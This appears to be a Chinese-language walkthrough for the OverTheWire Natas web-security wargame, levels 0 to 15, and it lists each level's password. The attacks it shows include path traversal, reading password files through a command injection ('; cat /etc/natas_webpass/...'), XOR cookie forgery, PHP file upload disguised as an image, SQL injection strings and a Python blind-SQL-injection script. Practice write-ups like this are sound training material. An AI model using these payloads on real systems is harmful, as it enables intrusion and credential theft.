Wargame – Natas 0-15通关攻略
Level 0
URL: http://natas0.natas.labs.overthewire.org
Username/password: natas0/natas0
查看注释

Level 1

Level 2

根据路径来到files目录

查看user.txt

Level 3

Google都找不到,说明针对爬虫做了设置,查看robots.txt文件

查看该路径,有个users.txt

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ |
Level 4

将Referer修改为指定链接

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq |
Level 5

将loggedin修改为1

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1 |
Level 6
根据include路径访问secret.inc文件


Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 |
Level 7

路径包含漏洞
http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8 |
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe |
Level 8

反向计算secret
hex2bin(3d3d516343746d4d6d6c315669563362) = “==QcCtmMml1ViV3b”
Strrev(==QcCtmMml1ViV3b) = “b3ViV1lmMmtCcQ==”
Base64_decode(b3ViV1lmMmtCcQ==) = “oubWYf2kBq”
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl |
Level 9

Passthru执行外部指令,拼接命令执行漏洞

直接查看natas10密码 ; cat /etc/natas_webpass/natas10

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu |
Level 10

过滤了一些字符,使用.* cat 命令查看

U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK |
Level 11
根据PHP和JS代码
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff"); function xor_encrypt($in) { $key = '<censored>'; $text = $in; $outText = ''; // Iterate through each character for($i=0;$i<strlen($text);$i++) { $outText .= $text[$i] ^ $key[$i % strlen($key)]; } return $outText; } function loadData($def) { global $_COOKIE; $mydata = $def; if(array_key_exists("data", $_COOKIE)) { $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true); if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) { if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) { $mydata['showpassword'] = $tempdata['showpassword']; $mydata['bgcolor'] = $tempdata['bgcolor']; } } } return $mydata; } function saveData($d) { setcookie("data", base64_encode(xor_encrypt(json_encode($d)))); } $data = loadData($defaultdata); if(array_key_exists("bgcolor",$_REQUEST)) { if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) { $data['bgcolor'] = $_REQUEST['bgcolor']; } } saveData($data); ?> <h1>natas11</h1> <div id="content"> <body style="background: <?=$data['bgcolor']?>;"> Cookies are protected with XOR encryption<br/><br/> <? if($data["showpassword"] == "yes") { print "The password for natas12 is <censored><br>"; } ?>
需要找到值key,并且showpassword=yes
已经给出的data值为 showpassword=no & bgcolor=>#ffffff
Data值位于cookie中,此时cookie值为
ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw= |
根据逆向此算法,求出key值
<?php $origData = base64_decode( "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw="); $key = '{"showpassword":"no","bgcolor":"#ffffff"}'; $outText = ""; for ($i = 0; $i < strlen(origData); $i++) { $outText .= $origData[$i] ^ $key[$i % strlen($key)]; } echo $outText; ?>
运行后得到qw8Jqw8J,则key = qw8J
则据此计算showpassword=yes时的cookie值
写出算法
<?php function xor_encrypt($in) { $key = 'qw8J'; $text = $in; $outText = ''; // Iterate through each character for($i=0;$i<strlen($text);$i++) { $outText .= $text[$i] ^ $key[$i % strlen($key)]; } return $outText; } echo base64_encode(xor_encrypt('{"showpassword":"yes","bgcolor":"#ffffff"}')); ?>
运行得到
ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK |
浏览器console设置cookie值


EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 |
Level 12
上传一个php文件,抓包,将jpg后缀修改为php


点击php链接,执行php代码获取密码
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY |
Level 13

修改文件后缀不好用了

Winhex打开制作图片马,写入jpg文件头FFD8FFE0

抓包修改后缀为php,上传成功可以访问php路径
Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 |
Level 14
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
使用万能密码注入就可以 “ or “1”=”1


AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J |
Level 15
存在sql的Boolean型盲注,利用搜索型注入like binary进行盲注爆破
import requests import string url = "http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/" characters = ''.join([string.ascii_letters, string.digits]) existsStr = 'This user exists.' strs = '' for i in characters: r = requests.get(url+'?username=natas16" AND password LIKE BINARY "%'+i+'%" "') if existsStr in r.content: strs += i print strs #strs = 'acehijmnpqtwBEHINORW03569' password = '' for i in range(32): for c in strs: r = requests.get(url + '?username=natas16" AND password LIKE BINARY "' +password+ c + '%" "') if existsStr in r.content: password += c print "Password: ",password break

直接用sqlmap进行boolean型盲注也可以得到natas16的密码

